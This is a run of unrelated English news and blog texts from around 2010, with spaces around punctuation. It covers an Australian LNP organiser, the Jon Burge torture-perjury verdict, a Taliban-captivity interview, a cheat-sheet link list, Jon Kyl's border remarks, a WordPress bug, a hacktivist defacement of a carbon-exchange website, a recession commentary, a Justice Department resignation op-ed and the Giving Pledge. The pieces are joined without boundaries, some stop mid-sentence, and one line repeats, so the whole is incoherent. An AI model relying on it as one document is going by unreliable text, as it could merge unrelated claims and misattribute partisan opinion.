Still Mr Ricupero's points are , at least , actually happening ( not things expected in future ) , can be measured in concrete terms and are long - term ( they should continue for decades ) .
Who knows ?
Perhaps they might even be right .
Guiding hand : Stephen Barber , previously involved in the US Republican Party ’s Tea Party movement , will work for the LNP on the Coast .
Guiding hand : Stephen Barber , previously involved in the US Republican Party ’s Tea Party movement , will work for the LNP on the Coast .
Contributed
A PEREGIAN Beach man who was involved in the US Republican Party ’s Tea Party movement and who has been labelled a “ barking mad ” Islamophobe has been awarded an organisational role in the Sunshine Coast LNP .
Stephen Barber in March sought LNP pre-selection for the federal seat of Longman , won by then - 19 - year - old Wyatt Roy , but he told the Daily he pulled out of the race in favour of local residents .
He said he would rather win a Senate position for the party , “ and had made that known to the party ” .
But Mr Barber may also be a source of badly needed political funding with a federal election looming , one MP said .
Website Australian Conservative said the LNP head office “ turned its back ” on the 53 - year - old who had “ an extremely impressive CV ” when it “ unapproved ” his candidacy for Longman .
But Mr Barber ’s own application for the Longman pre-selection , available online , includes in his points of view “ the need for Australia to avoid the demographic problems that Europe is beginning to experience as a result of Islamic immigration ” .
He said he started up a political website in the US called www.nationalone.org in 2006 , which in part is “ a response to growing mainstream resistance to the rise of Islamo - facism ( sic ) in the face of Western appeasement ” .
Mr Barber told the Daily his role would be “ working together with regional chairman Greg Newton to crank up the party movement and coordinate policy across the Coast ” .
“ The Tea Party Movement in the US was to get people involved in politics instead of sitting on the sidelines .
There is no compulsory vote in the US , ” he said .
But political website Vexnews quoted LNP insiders concerned about his extremist views , with one saying “ the LNP is going to get into hot water by associating with this bloke .
He puts the bark into barking mad . ”
Mr Barber chose not to respond to the comments , saying views were up to individuals .
Most local LNP members would not comment , including former member for Longman Mal Brough , who said he knew nothing about Mr Barber .
Federal Member for Fairfax Alex Somlyay said he could not comment on Mr Barber because he had not met him .
“ But people have mentioned him , ” he said .
“ I did hear ( regional chairman ) Greg Newton was very keen on him .
I heard the bloke was cashed up and supported the party financially . ”
Mr Newton did not return calls but a spokeswoman said Mr Barber had not run for pre-selection in Longman .
The mobster Jackie DiNorscio is shot by his own cousin at home while in probation but survives .
Later he is arrested dealing drugs and sentenced to thirty years in prison .
The prosecutor Sean Kierney proposes a deal to Jackie , immediately releasing him if he testifies against the Lucchese family and other mafia families but Jackie does not accept to rat his friends that he loves .
When the trial begins , he asks the judge Finestein to defend himself without the assistance of a lawyer .
Written by Claudio Carvalho , Rio de Janeiro , Brazil
From Democracy Now
Decades after torture allegations were first leveled against former Chicago police commander Jon Burge , a federal jury has found him guilty of lying about torturing prisoners into making confessions .
Burge has long been accused of overseeing the systematic torture of more than 100 African American men .
Two years ago federal prosecutors finally brought charges against Burge — not for torture , but for lying about it .
On Monday afternoon , after a five - week trial , Jon Burge was found guilty on all counts of perjury and obstruction of justice for lying about the abuse .
He could face up to forty - five years in prison .
Never mind what has happened in Abu Ghraib and Gitmo , as of Tuesday a Torture is headed for Jail in America and a 20 Year Campaign vicious of violence against innocent men .
This quote from one of the torture victims , where he nearly broke down with emotion was frankly hard to watch ...
MARK CLEMENTS :
These people stole my [ bleep ] life !
I hate to tell you the truth .
I sat in a prison cell , and I prayed for this day !
Today is a victory for every poor person .
I was sixteen years old !
This is America !
Sixteen years old !
What are we going to do about other people who are sitting in those prisons ?
And I ’m sorry if I ’m offending anyone , but it ’s out !
AMY GOODMAN : This was Mark Clements ’s response when reporters asked him how he felt .
MARK CLEMENTS : Relieved that finally at least one of these people are now going to finally feel the pain .
My daughter is twenty - nine years old .
I missed all those years with my daughter , sitting in them prison cells for a crime I did not commit .
I do not feel sorry for Jon Burge .
That ’s all I have to say .
Yes , what are we going to do about all the other people sitting in our prisons based on falsified evidence and falsified coerced confessions ?
According to the Innocence Project at least 25 % of the people who 've been exonerated from U.S. Prisons as a result of DNA evidence had provided false confessions .
Regardless of the age , capacity or state of the confessor , what they often have in common is a decision – at some point during the interrogation process – that confessing will be more beneficial to them than continuing to maintain their innocence .
From threats to torture
Sometimes law enforcement use harsh interrogation tactics with uncooperative suspects .
But some police officers , convinced of a suspect ’s guilt , occasionally use tactics so persuasive that an innocent person feels compelled to confess .
Some suspects have confessed to avoid physical harm or discomfort .
Others are told they will be convicted with or without a confession , and that their sentence will be more lenient if they confess .
Some are told a confession is the only way to avoid the death penalty .
Oh , and by the way , most of the people - as many as 72 % - who we 've been holding in Abu Ghraib , Gitmo and Bagram AFB are largely innocent too .
Salon -
The Miami Herald ’s Carol Rosenberg reports that , this week , yet another federal judge has ordered the Obama administration to release yet another Guantanamo detainee on the ground that there is no persuasive evidence to justify his detention .
The latest detainee to win his habeas hearing , Mohammed Hassen , is a 27 - year old Yemeni imprisoned by the U.S. without charges for 8 years , since he was 19 years old .
He has " long claimed he was captured in Pakistan studying the Quran and had no ties to al Qaida , " and that " he had been unjustly rounded up in a March 2002 dragnet by Pakistani security forces in the city of Faisalabad that targeted Arabs . "
Hassen is now the third consecutive detainee ordered freed who was rounded up in that same raid .
The Obama DOJ opposed his petition even though the Bush administration had cleared him for release in 2007 .
He has now spent roughly 30 % of his life in a cage at Guantanamo .
Will it take another 20 years for people such as Mohammed Hassen to finally have the justice that Mark Clements just received ?
Vyan
NEW YORK ( Reuters ) - The United States should pull its troops out of Afghanistan because the war cannot be won and neighboring Pakistan is funding the Taliban to undermine U.S. interests , the author of a new book says .
Journalist and veteran Afghanistan expert Jere Van Dyk is intimate with the war - torn country , after spending 45 harrowing days in 2008 jailed there and terrified he would be killed .
His new book “ Captive , My Time As A Prisoner Of The Taliban , ” published by Henry Holt ’s Times Books imprint , recounts his experience .
His captivity gave him plenty of time to think about prospects for the military struggle in Afghanistan , where the United States has been bogged down in a messy war since 2001 .
“ They ( the Taliban ) will never give in , ” Van Dyk told Reuters in an interview , adding , “ There is fundamentally no difference between the Afghan Taliban and the Pakistani Taliban -- they are all deep down Pashtuns . ”
The Pashtuns live in a series of tribal regions that lie along the mountainous border of Pakistan and Afghanistan .
Van Dyk , who lives in New York , has written for many publications , including The New York Times and The Wall Street Journal , and has traveled in Afghanistan and the region since the 1970s , reporting for CBS , CNN and other broadcasters .
Van Dyk also lived Afghanistan ’s mujahideen resistance in the 1980s during their war with the Soviet Union and wrote the book “ In Afghanistan : An American Odyssey . ”
Van Dyk said Pakistani military sources told him their goal was to use U.S. money to support the Taliban and help them take back Afghanistan , thus spreading Pakistan ’s sphere of influence and distracting the Taliban from fighting in Pakistan itself .
“ Pakistan is using the Taliban to further their own geopolitical goal , which is to prevent Pashtun nationalism from rising again , ” he said .
Pakistan has denied a recent report by the London School of Economics that alleges enduring ties between its intelligence agency and the Afghan Taliban .
The report said the agency not only funds and trains Taliban fighters in Afghanistan but is officially represented on the movement ’s leadership council , giving it significant influence over operations .
To end the conflict , Van Dyk proposes Washington confront Pakistan .
“ I would go directly to Pakistan and say , ‘ Stop funding the Taliban , stop using American money to kill American soldiers , cease your ultimate goal of taking over Afghanistan .... and then we should pull out , ” he said .
“ POINTLESS WAR ”
“ It is a completely pointless war , ” he said , adding that Washington should send significant aid to assist rebuilding Afghanistan .
Van Dyk is a consultant on Afghanistan , Pakistan and al Qaeda for CBS News .
After writing his first book on Afghanistan , he worked in the 1980s as a consultant to the State Department and was director of Friends of Afghanistan , a nonprofit which pushed for U.S. support for the mujahideen fight against the Soviets .
“ I felt guilty for having done that , ” he said , adding , “ What I was contributing to was more death and destruction . ”
As U.S. military involvement dragged on , that guilt weighed on Van Dyk and he felt he could once again explain Afghanistan to Americans .
This time he hoped to write a book showing life in the tribal areas of northwest Pakistan -- a place no Western journalist had been in years .
Drawing on his contacts from the 1980s , some who are now Taliban leaders , he thought he would explore the Pashtun region and report on the state of the Taliban and al Qaeda there .
But as the book ’s title makes clear , things went badly and he was taken hostage by the Taliban .
“ The Taliban commander led me to believe I could be killed at any moment .
It was a roller coaster , ” Van Dyk said .
Despite his fears , over the month and a half his captors never beat him but instead often engaged him in debates about politics and religion .
“ Sometimes we laughed , ” he said .
Two years later , Van Dyk says he has no idea why he was held or ultimately released -- perhaps it was for ransom or a prisoner exchange or because he was mistaken for a U.S. spy or his captors used him in a dispute with another faction .
He says he still receives threatening phone calls from Afghanistan and has some fears for his safety .
But asked if he would go back to Afghanistan , Van Dyk is uncertain .
“ I ’d like to go back .
I do n’t know if I can , or if I should , ” he said .
Cheatsheets and various quick reference guides are available for almost any type of software and language these days .
Unfortunately they ’re not always easy to find when you actually need them .
This is why I decided to take some time to gather up as many as possible and share them with you here !
Hopefully this can be a timesaver for you , along with teaching you a new trick or two .
The resources have been divided into various categories to make them easier to find .
Below are more than 100 cheat sheets and reference cards for the following topics :
CSS
CSS3 Cheat Sheet ↓
CSS2 Visual Cheat Sheet ↓
CSS Cheat Sheet ( V2 ) ↓
Css Property Index ↓
BluePrint CSS ↓
HTML
HTML 5 Cheat Sheet ↓
HTML5 Canvas Cheat Sheet ↓
HTML5 Glossary ↓
HTML Character Entities Cheat Sheet ↓
Color Codes Matching Chart HTML ( Convert CMYK , RGB Hex ) ↓
Javascript
JavaScript Cheat Sheet ↓
Javascript DOM ↓
JavaScript Reference Card ↓
j Query 1.4 API Cheat Sheet ↓
j Query selectors ↓
j Query 1.3.2 ↓
j Query 1.3 ↓
j Query 1.2 ↓
Mootools 1.2 Cheat Sheet ↓
Prototype Cheat Sheet ↓
PHP
PHP & MySQL for dummies ↓
PHP 5 Online Cheat Sheet v1.3 ↓
PHP5 Cheat sheet ↓
PHP Manual Quick Reference ↓
Printable PHP Security Checklist ↓
PHP Functions to work with MySQL ↓
MySQL
MySQL Cheat Sheet ↓
Handy Cheat Sheet of MySQL Commands ↓
HTML Colors Cheat Sheet ↓
RGB Hex Colour Chart ↓
Web Safe Color Chart ↓
The Browser - Safe Colors ↓
Megapixels Chart ( and print size ) ↓
Points to pixels conversion ↓
Web Safe Fonts v2 ( including Google API ) ↓
25 - point Website Usability Checklist ↓
Webdesign for dummies ↓
The Web Developer ’s SEO Cheat Sheet ↓
SEO for dummies ↓
Will the browser apply the rule(s ) ? ↓
When can I use ?
Compatibility tables ( html5 , css3 + + ) ↓
CMS
WordPress Help Sheet ↓
The Advanced WordPress Help Sheet ↓
WordPress Theme Development Checklist ↓
WordPress Template Tags ↓
WordPress Optimization Cheat Sheet ↓
SEO for WordPress ↓
Drupal 7 : The database ↓
Drupal 6 API Cheat Sheet ↓
Drupal for dummies ↓
Joomla 1.5 Basic Template Cheat Sheet ↓
Joomla for dummies ↓
Softwares
ActionScript 3.0 ↓
Adobe Flex3 ↓
Adobe Air Cheat Sheet ↓
Adobe Acrobat 9 Shortcuts ↓
Adobe Acrobat 8 Quick Reference ↓
Adobe Flash CS5 & Flash Catalyst for dummies ↓
Adobe Flash CS4 Shortcuts ↓
Adobe Dreamweaver CS5 – all in one for dummies ↓
Dreamweaver CS4 shortcuts ↓
DreamWeaver CS3 Reference Card ↓
Adobe Fireworks CS3 Quick Reference ↓
Adobe After Effects CS4 Cheat Sheet ↓
Adobe Illustrator CS4 Shortcuts ↓
Adobe Photoshop CS5 – all in one for dummies ↓
Adobe Photoshop Shortcuts ↓
Photoshop Elements8 For Dummies ↓
Adobe Lightroom 2.0 Shortcuts ↓
Adobe Indesign CS5 for dummies ↓
Adobe InDesign CS4
Tools and shortcuts ↓
GIMP Quick reference ↓
Apple Final Cut Pro 5 ↓
QuarkXpress 8 ↓
3 DS max 9 ↓
Blender for dummies ↓
AutoCAD 2011 for dummies ↓
Google Sketchup 7 for dummies ↓
OpenOffice.org for dummies ↓
Office 2010 – all in one for dummies ↓
Browsers & OS
Mozilla Firefox Cheat Sheet ↓
Google Chrome Keyboard Shortcuts ↓
Internet Explorer 8 – quick reference card ↓
Windows 7 Cheat Sheet ↓
Windows Alt Codes ↓
Ultimate Switcher Guide : PC to MAC ↓
Mac OS X Keyboard Cheat Sheet ↓
Mac OS X Leopard – 200 productivity boosters ↓
Macs
All - in - one for dummies ↓
Linux for dummies ↓
Ubuntu reference ↓
Ruby on Rails Cheat Sheet ↓
Python Cheat Sheet ↓
ASP / VBScript Cheat Sheet ↓
ASP .net ↓
Regular Expression Cheat Sheet ( .NET ) ↓
Core C# and .NET Quick Reference ↓
960 Grid System Cheat Sheet ↓
Firebug Cheat Sheet ↓
Tcp Ports List ↓
VOIP Basics ↓
VI ( Linux Terminal ) Cheat sheet ↓
Mathematica Keyboard Shortcuts ↓
Country Codes – quick reference ↓
User Centred Design ↓
The Social Landscape ( social media ) ↓
Your Turn To Talk
We hope you found our list of cheatsheets / quick references useful .
If we missed any or you have other feedback , please leave a comment .
Also remember to share this post if you found it useful ! ;)
Jon Kyl Walks Back Claim That Obama Is Holding Border Security “ Hostage ”
Senator Jon Kyl is distancing himself from earlier comments that he made accusing the President of holding border security " hostage . "
Doug Mataconis · · 7 comments
Earlier this week , Arizona Senator Jon Kyl made this rather startling claim :
On June 18 , 2010 , Arizona Republican Senator Jon Kyl told the audience at a North Tempe Tea Party town hall meeting that during a private , one - on - one meeting with President Obama in the Oval Office , the President told him , regarding securing the southern border with Mexico , “ The problem is , . . . if we secure the border , then you all wo n’t have any reason to support ‘ comprehensive immigration reform . ’ ”
[ Audible gasps were heard throughout the audience . ]
Sen .
Kyl continued , “ In other words , they ’re holding it hostage .
They do n’t want to secure the border unless and until it is combined with ‘ comprehensive immigration reform . ’ ”
Sen .
Kyl also said he reminded President Obama that the President and the Congress have an obligation , a duty , to secure the border .
I shot the following video of Sen .
Kyl while sitting next to the man who asked the question .
You can see video of Kyl ’s statement here .
The White House quickly shot back and denied that the conversation Kyl related had ever taken place , but then Kyl ’s fellow Arizona Senator , John McCain , said that the same thing had been said to him .
Kyl ’s and McCain ’s statement ’s were immediately taken up by conservative bloggers and commentators , with the likes of Charles Krauthammer and Tucker Carlson calling it a dereliction of duty .
Well , now it seems that Kyl is trying to say that he did n’t say what people claim he said :
Kyl , of course , had a small spat with the White House last week over comments he made at a town - hall meeting .
Kyl , responding to a voter ’s question , detailed a recent one - on - one conversation he had with the president .
“ They are holding [ border security ] hostage ” over hopes for comprehensive immigration reform , Kyl said at the forum .
Kyl tells us that the comments were “ taken a bit out of context , ” and that the “ they ” he was referring to was the Left , “ the president ’s base , ” and not the administration .
“ I did not try to start a fight .
This meeting happened a month ago and we were talking in the context of his political problems .
He was talking about how they think that if we secure the border , you guys [ Republicans ] wo n’t have the incentive to work on comprehensive immigration reform . ”
The problem , of course , is that if you go back and watch the video , it ’s fairly clear that Kyl was at the very least implying that it was the President himself who was saying that he would not secure the border without a deal on immigration reform .
Now , Kyl is saying that he was actually referring to the President ’s supporters , a very different thing obviously .
More importantly , Kyl clearly spent most of the week allowing the impression to be held by the public that he had been referring directly to the President .
So , is Kyl a jerk who was pretty much lying about what the President said to him , or is he a political opportunist trying to heal a rift with the White House ?
I ’ll leave that for the readers to decide themselves .
A board - certified pediatrician with the American Academy of Pediatrics , Dr. Louis Borgenicht has run his own practice in Salt Lake City for the last 16 years .
He is also Assistant Professor of Pediatrics at The University of Utah School of Medicine , and he serves on the Board of Directors for Physicians for Social Responsibility .
In 2002 , " Ladies ' Home Journal " named him the Best Pediatrician in Utah .
Dr. Borgenicht lives with his wife , Jody , who has finally learned how to sleep through the night while her husband goes out on calls .
Joe Borgenicht is a first - time father who frequently telephones his dad for advice .
He is also a writer , a television producer , and the co-author of " The Action Hero 's Handbook . "
He lives in Salt Lake City with his wife , Melanie , and their son , Jonah ( who still operates at peak efficiency after his first eighteen months ) .
Paul Kepple and Jude Buffum are better known as the Philadelphia - based studio Headcase Design , whose work has been featured in many design publications , such as " American Illustration , " " Communication Arts , " and " Print . "
Paul worked at Running Press Book Publishers for several years before opening Headcase in 1998 .
Both graduated from the Tyler School of Art , where they now teach .
When Jude was an infant , his owners would often program him for extended periods of sleep mode .
Paul 's owners , on the other hand , tried numerous times to return their model , believing his inability to grow hair was a manufacturer 's defect .
I have a image called " WordpressLogo_blue - m.png " in one of my posts : ​http://www.bitvolution.com/wordpress-image-gallery-plugin and it has broken since I upgraded to v3.0 .
The image is broken because WordPress is renaming it to " WordPressLogo_blue - m.png " - i.e. WordPress is auto camelcasing " Wordpress " to " WordPress " ( note the uppercase ' P ' ) .
I also tested this in the lastest 3.1 - alpha version .
I would n't mind too much because I agree it is my fault I have spelt Wordpress incorrectly .
However , for resources like images , it is not easy to change the filename so I think the automatic renaming should be disabled ?
In response to Tony Hayward 's June 4 op - ed " What BP Is Doing about the Gulf Gusher " :
It is time that the publicity spin that BP is putting on this disaster is put into perspective .
What is alarming about the content of the article is not so much what it says , but what it does not say .
Mr. Haywood , chief executive officer of British Petroleum , asks , " How could this happen ? "
The answer has largely to do with BP 's inability to follow its existing well - construction policies and those of the industry generally .
The ...
It ’s a cliche to say that Minority Report - style interfaces are just around the corner .
But not when John Underkoffler is involved .
As tech advistor on the film , he was the guy whose work actually inspired the interfaces that Tom Cruise used .
The real - life system he ’s been developing , called g- speak , is unbelievable .
We ’ve previously covered Underkoffler and his startup , Oblong , but in February , he unveiled his latest work at TED .
The video was just recently put online .
And .
It . Will .
Blow .
Your .
Mind .
The video is 15 minutes long , but fast forward to 6:30 if you want to zip straight to the trippy stuff .
Oblong has n’t previously revealed most of the features you see in the later half of the video , including the ability zoom in and fly through a virtual , 3 - D image environment ( 6:30 ) ; the ability to navigate a SQL database in 3 - D ( 8:40 ) ; the gestural wand that lets you manipulate and disassemble 3 - D models ( 10:00 ) ; and the stunning movie - editing system , called Tamper ( 11:00 ) .
Anti-carbon trading activists shut down the website of the European Climate Exchange ( ECX ) , over the weekend , replacing the site with a spoof page lampooning the industry .
The website of the London - based carbon credit trading platform was hacked at close to midnight on Friday and showed the spoof homepage for around 22 hours .
It then took technical staff another day to restore the official homepage .
Instead of its normal rolling ticker data listing bids for carbon credit futures , the ECX website blared : " Super promo – climate on sale : Guaranteed profit ! "
Explaining the " carbon trade scam " , the spoof site decried how the EU 's flagship environmental policy is " susceptible to corporate lobbying , " offers industry " licences to pollute so they can continue business - as - usual , " and " generates outrageous profits for big industry polluters , investors in fraudulent offset projects [ and ] opportunist traders . "
On Saturday , shortly after the ECX website went down , activists announced their handiwork on a number of environmental discussion groups , saying : " In a public act of digital direct action , the ECX website was taken offline and replaced with our message in an effort to try to raise awareness about carbon trading as a dangerous false solution to the climate crisis . "
One of the activists responsible , from the online activist group , Decocidio , told the Guardian : " We feel the EU Emissions Trading Scheme is not well understood by the general public or even within the environmental movement .
It is a major fraud touted by the mainstream media , politics , industry and lobbyists as the main solution . "
The group is part of Earth First , a radical environmental protest organisation .
" Attempting to cause as much inconvenience , economical loss and image damage as possible , we deliberately tried to maximise the virtual damage , " said the hacker , who spoke on condition of anonymity .
A spokeswoman for the European Climate Exchange , Kelly Loeffler , said : " We have no comment relating to the incident as there is nothing to report publicly . "
The exchange was also targeted by activists from Climate Camp last summer .
They dubbed it a " climate change casino " .
Damien Morris , of Sandbag , a self - described " critical friend " of the EU ETS said : " It 's very unfortunate that this sort of infighting over emissions trading has developed within the environmental movement , especially on the radical end , " he said .
" There seems to be a large grassroots following and public presence of these sorts of ideas , but not at the more technical and realistic , solutions - focussed part of the movement . "
" There is certainly a place for criticism of the ETS , but the problem with those who disagree with carbon trading is that they oppose it in principle , not in practice .
It 's a good idea when done properly .
There are many problems with the ETS , but there is a clear pathway as to how it can be made more effective and robust . "
Do n’t you love it ( or hate it ) when someone says something that makes you question your grip on reality because it challenges your assumptions ?
This morning , I got such an email from a gentleman who works in the publishing industry .
He saw my article in ; login : about sysadmin training , and basically asked me why sysadmins are n’t buying books anymore .
Well , I can tell you that I nearly dropped my bagel and coffee coolata .
Sysadmins not buying books ?
Hogwash .
Poppycock . ( inserts monocle )
Then , of course , I thought about it .
The last paper book that I bought was Pulling Strings with Puppet …and before that ?
I ’m honestly not sure .
In fact , the only reason that I bought Pulling Strings was because it was n’t available on O’Reilly ’s Safari… OK , there might be something to this …
I considered the reasons that I have n’t been buying books all the way to the office this morning , and I came up with what I think are some possible reasons .
I ’m going to share them , but I would really like to hear what your stance on this is .
Aside from the fact that I ’m writing a book , and thus have a very direct interest in this subject , I think it also has ramifications on the larger community , because for a long time , books have been our go - to source of information .
If that truly is changing , then it ’s a not - insignificant alteration , and everyone is going to have to deal with the ramifications of that .
Personally , I have n’t bought books lately because I currently own books on the core utilities that I referenced when I was originally learning them , and now refer to them almost exclusively in odd corner cases ( or more frequently , refer to online forums or sources ) .
I also feel like the existing books on the techniques that I ’m using ( Enterprise Storage and Virtualization ) are written for people with the budget to leverage the full strengths of the platforms , rather than the limited subset that I ’m using because I ’ve got the free ( or low end ) solutions in place .
In addition , from a 10,000 ft view , I suspect ( and this is pure conjecture ) that the profession of system administration is probably maturing .
The older sysadmins already have copies of “ Essential Systems Administration ” and “ The Practice of System and Network Administration ” .
Younger sysadmins either “ grow up ” in an environment where they have elders to learn from ( and thus , probably access to the same books ) or they ’re on their own in small shops which wo n’t pay for books , so if they do n’t buy it personally , they do n’t have it .
Those are my suggestions , but I really do want to hear yours .
Please visit the site and comment .
You have a voice in this discussion , too .
This is also a Slashdot submission .
Please vote it up if you ’re interested in the subject !
The economy is still in the gravitational pull of the Great Recession and all the booster rockets for getting us beyond it are failing .
The odds of a double dip are increasing .
In June the nation added fewer jobs than necessary merely to keep up with population growth ( private hiring rose by 83,000 after adding only 33,000 jobs in May ) .
The typical workweek declined .
Average earnings dropped .
Home sales are down .
Retail sales are down .
Factory orders in May suffered their biggest tumble since March of last year .
So what are we doing about it ?
Less than nothing .
The states are running an anti-stimulus program ( raising taxes , cutting services , laying off teachers , firefighters , police and other employees ) that ’s now bigger than the federal stimulus program .
That federal stimulus is 75 percent gone anyway .
And the House and Senate refuse to pass another one .
( The Senate left Washington for the July 4th weekend without even extending unemployment benefits for millions of jobless Americans now running out . )
The second booster rocket – the Fed ’s rock - bottom short - term interest rates – are having almost no effect .
That ’s because jobs and wages are so lousy that consumers do n’t have enough money to buy much of anything , making small businesses bad credit risks and causing big ones to sit on the huge pile of cash they ’ve accumulated .
Wall Street and the other biggest global banks , meanwhile , are making piles of money betting against government debt all over the world .
These were the same banks and financiers , remember , that were bailed out by government not long ago .
But now they ’re demanding fiscal austerity , and politicians are once again doing their bidding – cutting deficits in every rich economy that should now be doing the reverse .
The people who are suffering the most from the failure of public officials and the greed of large bankers are the least able to endure it .
Unemployment among people with four - year college degrees is barely over 5 percent ; among high - school dropouts it ’s over 25 percent .
Those who have been jobless the longest or who have left the labor force altogether are men over fifty who are least likely to get back in .
Families most in need are losing the services – state - supported Medicaid , child dental care , after - school programs for the kids , public transit – they most depend on .
The irony is that had there been no bank bailout in 2008 and 2009 , no large stimulus , and no extraordinary efforts by the Fed to pump trillions of dollars into the economy , we ’d have had another Great Depression .
And because it would have sucked almost everyone down with it , the nation would have demanded from politicians larger and more fundamental reforms that might well have lifted everyone , and set America and the world on a more sustainable path toward growth and shared prosperity :
A stimulus that financed the rebuilding of the nation ’s infrastructure and alternative energies , single - payer health care , a cap on the size of big banks and resurrection of Glass - Steagall , earnings insurance , an Earned Income Tax Credit that extended into the middle class , and a truly progressive tax coupled with a price on carbon to pay for all of this over the long term .
No one in their right mind would have wished for another Great Depression , of course .
But we seem to have got the worst of all worlds .
The bank bailout , the stimulus , and the Fed brought us back from the brink just enough to dampen zeal for anything more .
As a result , we are now slouching toward a tepid recovery that could just as well fall into a double dip recession , while a large portion of our population suffers immensely .
Robert Reich
This article first appeared on Robert Reich ’s Blog .
Republished with permission
In 2012 , Canadian author Yann Martel received a thoughtful thank you letter in the mail in response to his award - winning novel , Life of Pi .
Such appreciative letters are understandably not a rarity for Martel , however the writer of this particular handwritten note , a fan who had recently read the book with his daughter , happened to be Barack Obama .
Said the author :
“ What amazes me is the gratuity of it .
As you would know , there is a large measure of calculation in what public figures do .
But here , what does he gain ?
I ’m not a US citizen .
In no way can I be of help to President Obama .
Clearly he did it for personal reasons , as a reader and as a father .
And in two lines , what an insightful analysis of Life of Pi. Bless him , bless him . ”
Transcript follows .
Transcript
THE WHITE HOUSE
WASHINGTON Mr. Martel —
My daughter and I just finished reading Life of Pi together .
Both of us agreed we prefer the story with animals .
It is a lovely book — an elegant proof of God , and the power of storytelling .
Thank you .
( Signed , ‘ Barack Obama ’ )
ANALYSIS / OPINION :
On the day President Obama was elected , armed men wearing the black berets and jackboots of the New Black Panther Party were stationed at the entrance to a polling place in Philadelphia .
They brandished a weapon and intimidated voters and poll watchers .
After the election , the Justice Department brought a voter - intimidation case against the New Black Panther Party and those armed thugs .
I and other Justice attorneys diligently pursued the case and obtained an entry of default after the defendants ignored the charges .
Before a final judgment could be entered in May 2009 , our superiors ordered us to dismiss the case .
The New Black Panther case was the simplest and most obvious violation of federal law I saw in my Justice Department career .
Because of the corrupt nature of the dismissal , statements falsely characterizing the case and , most of all , indefensible orders for the career attorneys not to comply with lawful subpoenas investigating the dismissal , this month I resigned my position as a Department of Justice ( DOJ ) attorney .
The federal voter - intimidation statutes we used against the New Black Panthers were enacted because America never realized genuine racial equality in elections .
Threats of violence characterized elections from the end of the Civil War until the passage of the Voting Rights Act in 1965 .
Before the Voting Rights
Act , blacks seeking the right to vote , and those aiding them , were victims of violence and intimidation .
But unlike the Southern legal system , Southern violence did not discriminate .
Black voters were slain , as were the white champions of their cause .
Some of the bodies were tossed into bogs and in one case in Philadelphia , Miss. , they were buried together in an earthen dam .
Based on my firsthand experiences , I believe the dismissal of the Black Panther case was motivated by a lawless hostility toward equal enforcement of the law .
Others still within the department share my assessment .
The department abetted wrongdoers and abandoned law - abiding citizens victimized by the New Black Panthers .
The dismissal raises serious questions about the department ’s enforcement neutrality in upcoming midterm elections and the subsequent 2012 presidential election .
The U.S. Commission on Civil Rights has opened an investigation into the dismissal and the DOJ ’s skewed enforcement priorities .
Attorneys who brought the case are under subpoena to testify , but the department ordered us to ignore the subpoena , lawlessly placing us in an unacceptable legal limbo .
The assistant attorney general for civil rights , Tom Perez , has testified repeatedly that the “ facts and law ” did not support this case .
That claim is false .
If the actions in Philadelphia do not constitute voter intimidation , it is hard to imagine what would , short of an actual outbreak of violence at the polls .
Let ’s all hope this administration has not invited that outcome through the corrupt dismissal .
Most corrupt of all , the lawyers who ordered the dismissal - Loretta King , the Obama - appointed acting head of the Civil Rights Division , and Steve Rosenbaum - did not even read the internal Justice Department memorandums supporting the case and investigation .
Just as Attorney General Eric H. Holder Jr. admitted that he did not read the Arizona immigration law before he condemned it , Mr. Rosenbaum admitted that he had not bothered to read the most important department documents detailing the investigative facts and applicable law in the New Black Panther case .
Christopher Coates , the former Voting Section chief , was so outraged at this dereliction of responsibility that he actually threw the memos at Mr. Rosenbaum in the meeting where they were discussing the dismissal of the case .
The department subsequently removed all of Mr. Coates ’ responsibilities and sent him to South Carolina .
Mr. Perez also inaccurately testified to the House Judiciary Committee that federal “ Rule 11 ” required the dismissal of the lawsuit .
Lawyers know that Rule 11 is an ethical obligation to bring only meritorious claims , and such a charge by Mr. Perez effectively challenges the ethics and professionalism of the five attorneys who commenced the case .
Yet the attorneys who brought the case were voting rights experts and would never pursue a frivolous matter .
Their experience in election law far surpassed the experience of the officials who ordered the dismissal .
Some have called the actions in Philadelphia an isolated incident , not worthy of federal attention .
To the contrary , the Black Panthers in October 2008 announced a nationwide deployment for the election .
We had indications that polling - place thugs were deployed elsewhere , not only in November 2008 , but also during the Democratic primaries , where they targeted white Hillary Rodham Clinton supporters .
In any event , the law clearly prohibits even isolated incidents of voter intimidation .
Others have falsely claimed that no voters were affected .
Not only did the evidence rebut this claim , but the law does not require a successful effort to intimidate ; it punishes even the attempt .
Most disturbing , the dismissal is part of a creeping lawlessness infusing our government institutions .
Citizens would be shocked to learn about the open and pervasive hostility within the Justice Department to bringing civil rights cases against nonwhite defendants on behalf of white victims .
Equal enforcement of justice is not a priority of this administration .
Open contempt is voiced for these types of cases .
Some of my co-workers argued that the law should not be used against black wrongdoers because of the long history of slavery and segregation .
Less charitable individuals called it “ payback time . ”
Incredibly , after the case was dismissed , instructions were given that no more cases against racial minorities like the Black Panther case would be brought by the Voting Section .
Refusing to enforce the law equally means some citizens are protected by the law while others are left to be victimized , depending on their race .
Core American principles of equality before the law and freedom from racial discrimination are at risk .
Hopefully , equal enforcement of the law is still a point of bipartisan , if not universal , agreement .
However , after my experience with the New Black Panther dismissal and the attitudes held by officials in the Civil Rights Division , I am beginning to fear the era of agreement over these core American principles has passed .
J. Christian Adams is a lawyer based in Virginia who served as a voting rights attorney at the Justice Department until this month .
He blogs at electionlawcenter.com .
Sign up for Daily Opinion Newsletter Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
* Buffett , Gates ask rich to give away wealth to charity
* Giving Pledge campaign targeting U.S. billionaires ( Adds comment from Eli and Edythe Broad )
NEW YORK , June 16 ( Reuters ) - Investor Warren Buffett and Microsoft MSFT .
O founder Bill Gates announced on Wednesday that they are asking hundreds of billionaire Americans to give away at least 50 percent of their wealth to charity .
Buffett , who made his fortune with insurance and investment company Berkshire Hathaway Inc BRKa .
NBRKb.N , Gates and his wife , Melinda , have held a series of dinners with a couple dozen rich Americans in the past year to urge them to make a philanthropic pledge .
They have named the campaign the Giving Pledge and are asking those who commit to giving away at least half their fortune during their lifetime or after their death to publicly state their intention with a letter explaining their decision .
Patty Stonesifer , a former chief executive of the Gates Foundation and now adviser to Gates and Buffett , said that four families had agreed to announce their pledge on Wednesday -- real estate and construction billionaire Eli Broad , venture capitalist John Doerr , media entrepreneur Gerry Lenfest and former Cisco Systems CSCO.O Chairman John Morgridge .
Broad and his wife Edythe said in a statement that they will pledge to give away 75 percent of their wealth during and after their lifetime .
Forbes has estimated Broad to be worth $ 5.7 billion .
